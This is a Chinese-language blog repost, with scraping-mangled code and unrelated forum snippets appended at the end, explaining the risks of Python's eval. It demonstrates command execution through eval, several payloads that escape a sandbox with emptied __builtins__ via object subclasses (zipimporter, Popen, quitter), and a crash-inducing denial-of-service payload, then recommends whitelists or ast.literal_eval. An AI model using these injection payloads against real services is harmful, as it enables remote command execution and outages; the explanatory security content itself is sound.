- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章python 为什么说eval要慎用由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
eval前言 。
1
2
3
4
5
|
in
[
1
]:
eval
(
"2+3"
)
out[
1
]:
5
in
[
2
]:
eval
(
'[x for x in range(9)]'
)
out[
2
]: [
0
,
1
,
2
,
3
,
4
,
5
,
6
,
7
,
8
]
|
当内存中的内置模块含有os的话,eval同样可以做到命令执行:
1
2
3
4
5
|
in
[
3
]:
import
os
in
[
4
]:
eval
(
"os.system('whoami')"
)
hy
-
201707271917
\administrator
out[
4
]:
0
|
当然,eval只能执行python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:
1
2
3
|
in
[
8
]:
eval
(
"__import__('os').system('whoami')"
)
hy
-
201707271917
\administrator
out[
8
]:
0
|
在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞.
”安全”使用eval 。
现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:
eval函数的声明为eval(expression[, globals[, locals]]) 。
其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数.
1
2
3
4
5
6
7
8
9
10
11
|
>>>
import
os
>>>
'os'
in
globals
()
true
>>>
eval
(
'os.system('
whoami
')'
)
win
-
20140812chjadministrator
0
>>>
eval
(
'os.system('
whoami
')'
,{},{})
traceback (most recent call last):
file
"", line
1
,
in
file
"", line
1
,
in
nameerror: name
'os'
is
not
defined
|
如果指定只允许调用abs函数,可以使用下面的写法:
1
2
3
4
5
6
7
8
9
10
|
>>>
eval
(
'abs(-20)'
,{
'abs'
:
abs
},{
'abs'
:
abs
})
20
>>>
eval
(
'os.system('
whoami
')'
,{
'abs'
:
abs
},{
'abs'
:
abs
})
traceback (most recent call last):
file
"", line
1
,
in
file
"", line
1
,
in
nameerror: name
'os'
is
not
defined
>>>
eval
(
'os.system('
whoami
')'
)
win
-
20140812chjadministrator
0
|
使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题! 。
绕过执行代码1 。
被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:
1
2
3
4
5
6
7
8
|
env
=
{}
env[
"locals"
]
=
none
env[
"globals"
]
=
none
env[
"__name__"
]
=
none
env[
"__file__"
]
=
none
env[
"__builtins__"
]
=
none
eval
(users_str, env)
|
python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:
1
2
3
4
|
>>> __builtins__.
abs
(
-
20
)
20
>>>
abs
(
-
20
)
20
|
我们也可以自定义内置函数,并像使用python中的内置函数一样使用它们:
1
2
3
4
5
|
>>>
def
hello():
...
print
'shabi'
>>> __builtin__.__dict__[
'say_hello'
]
=
hello
>>> say_hello()
shabi
|
小明将eval函数的作用域中的内置模块设置为none,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:
1
2
3
4
|
>>>
id
(__builtins__)
3549136
>>>
id
(__builtin__)
3549136
|
根据乌云drops提到的方法,使用如下代码即可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname") 。
上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:
1
2
3
4
5
6
7
8
9
10
11
|
>>>
"os"
in
configobj.__dict__
true
>>>
import
urllib
>>>
"os"
in
urllib.__dict__
true
>>>
import
urllib2
>>>
"os"
in
urllib2.__dict__
true
>>> configobj.os.system(
"whoami"
)
win
-
20140812chjadministrator
0
|
和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:
1
|
from
setuptools
import
setup, find_packages
|
然后执行
1
|
python setup.py bdist_egg
|
就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
>>> env
=
{}
>>> env[
"locals"
]
=
none
>>> env[
"globals"
]
=
none
>>> env[
"__name__"
]
=
none
>>> env[
"__file__"
]
=
none
>>> env[
"__builtins__"
]
=
none
>>> users_str
=
"[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('e:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>>
eval
(users_str, env)
win
-
20140812chjadministrator
0
>>>
eval
(users_str, {}, {})
win
-
20140812chjadministrator
0
|
拒绝服务攻击1 。
object的子类中有很多有趣的东西,执行以下代码查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()] 。
这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类quitter进行退出:
1
2
|
>>>
eval
("[x
for
x
in
().__class__.__bases__[
0
].__subclasses__()
if
x.__name__
=
=
'quitter'
][
0
](
0
)()", {
'__builtins__'
:none})
|
c:/> 。
如果运气好,遇到对方程序中导入了os等敏感模块,那么popen就可以用,并且绕过__builins__为空的限制,例子如下:
1
2
3
4
5
|
>>>
import
subprocess
>>>
eval
(
"[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'popen'][0](['ping','-n','1','127.0.0.1'])"
,{
'__builtins__'
:none})
>>>
正在 ping
127.0
.
0.1
具有
32
字节的数据:<br>来自
127.0
.
0.1
的回复: 字节
=
32
时间>>
|
事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用.
拒绝服务攻击2 。
同样,我们甚至可以绕过__builtins__为none,造成一次拒绝服务攻击,payload(来自老外blog)如下:
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"kaboom",(),(),(),"","",0,""),{})())()', {"__builtins__":none}) 。
运行上面的代码,python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是kaboom,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡.
总结 。
从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval.
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持我.
原文链接:https://segmentfault.com/a/1190000011532358 。
最后此篇关于python 为什么说eval要慎用的文章就讲到这里了,如果你想了解更多关于python 为什么说eval要慎用的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
我正在处理一组标记为 160 个组的 173k 点。我想通过合并最接近的(到 9 或 10 个组)来减少组/集群的数量。我搜索过 sklearn 或类似的库,但没有成功。 我猜它只是通过 knn 聚类
我有一个扁平数字列表,这些数字逻辑上以 3 为一组,其中每个三元组是 (number, __ignored, flag[0 or 1]),例如: [7,56,1, 8,0,0, 2,0,0, 6,1,
我正在使用 pipenv 来管理我的包。我想编写一个 python 脚本来调用另一个使用不同虚拟环境(VE)的 python 脚本。 如何运行使用 VE1 的 python 脚本 1 并调用另一个 p
假设我有一个文件 script.py 位于 path = "foo/bar/script.py"。我正在寻找一种在 Python 中通过函数 execute_script() 从我的主要 Python
这听起来像是谜语或笑话,但实际上我还没有找到这个问题的答案。 问题到底是什么? 我想运行 2 个脚本。在第一个脚本中,我调用另一个脚本,但我希望它们继续并行,而不是在两个单独的线程中。主要是我不希望第
我有一个带有 python 2.5.5 的软件。我想发送一个命令,该命令将在 python 2.7.5 中启动一个脚本,然后继续执行该脚本。 我试过用 #!python2.7.5 和http://re
我在 python 命令行(使用 python 2.7)中,并尝试运行 Python 脚本。我的操作系统是 Windows 7。我已将我的目录设置为包含我所有脚本的文件夹,使用: os.chdir("
剧透:部分解决(见最后)。 以下是使用 Python 嵌入的代码示例: #include int main(int argc, char** argv) { Py_SetPythonHome
假设我有以下列表,对应于及时的股票价格: prices = [1, 3, 7, 10, 9, 8, 5, 3, 6, 8, 12, 9, 6, 10, 13, 8, 4, 11] 我想确定以下总体上最
所以我试图在选择某个单选按钮时更改此框架的背景。 我的框架位于一个类中,并且单选按钮的功能位于该类之外。 (这样我就可以在所有其他框架上调用它们。) 问题是每当我选择单选按钮时都会出现以下错误: co
我正在尝试将字符串与 python 中的正则表达式进行比较,如下所示, #!/usr/bin/env python3 import re str1 = "Expecting property name
考虑以下原型(prototype) Boost.Python 模块,该模块从单独的 C++ 头文件中引入类“D”。 /* file: a/b.cpp */ BOOST_PYTHON_MODULE(c)
如何编写一个程序来“识别函数调用的行号?” python 检查模块提供了定位行号的选项,但是, def di(): return inspect.currentframe().f_back.f_l
我已经使用 macports 安装了 Python 2.7,并且由于我的 $PATH 变量,这就是我输入 $ python 时得到的变量。然而,virtualenv 默认使用 Python 2.6,除
我只想问如何加快 python 上的 re.search 速度。 我有一个很长的字符串行,长度为 176861(即带有一些符号的字母数字字符),我使用此函数测试了该行以进行研究: def getExe
list1= [u'%app%%General%%Council%', u'%people%', u'%people%%Regional%%Council%%Mandate%', u'%ppp%%Ge
这个问题在这里已经有了答案: Is it Pythonic to use list comprehensions for just side effects? (7 个答案) 关闭 4 个月前。 告
我想用 Python 将两个列表组合成一个列表,方法如下: a = [1,1,1,2,2,2,3,3,3,3] b= ["Sun", "is", "bright", "June","and" ,"Ju
我正在运行带有最新 Boost 发行版 (1.55.0) 的 Mac OS X 10.8.4 (Darwin 12.4.0)。我正在按照说明 here构建包含在我的发行版中的教程 Boost-Pyth
学习 Python,我正在尝试制作一个没有任何第 3 方库的网络抓取工具,这样过程对我来说并没有简化,而且我知道我在做什么。我浏览了一些在线资源,但所有这些都让我对某些事情感到困惑。 html 看起来
我是一名优秀的程序员,十分优秀!